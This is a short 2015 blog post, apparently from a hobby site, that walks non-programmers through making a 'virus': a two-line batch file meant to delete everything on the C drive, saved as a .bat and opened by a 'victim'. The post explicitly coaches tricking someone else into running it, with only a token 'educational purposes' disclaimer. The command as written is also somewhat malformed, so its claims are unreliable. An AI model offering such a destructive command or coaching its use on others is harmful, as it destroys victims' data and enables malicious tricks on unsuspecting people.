Monday, 1 June 2015

Let's make a simple virus

Hello Friends. Welcome to the first Post of Cyber fools. It is our first post so we thought why not start with an exciting start. Making a virus seemed that exciting to us. There must be many non - programmer readers wanting to make a virus but are just not able due to lack of knowledge. That would not be a problem from now. Given below is the code of a virus made in batch programming language. It can be dangerous so use it wisely. Follow the given simple steps towards the first virus of your life:
1.Open Notepad from the start menu (None is allowed to ask how to open a Notepad). And type the code given in step 2.
2. @echo off
   Del C:\ *.*|y
3.Save it as anything.bat
4. Your virus is ready to serve with troubles. Make the victim open this file in his computer.
Everyone by now must be wondering what does this virus do?
So here's the answer. This virus deletes every single piece of data from the victim's C drive. So please don't open it in your own computer.

Note: This post is for educational purposes only. We don't promote misuse of it. You are fully responsible for what you do.

1 comment: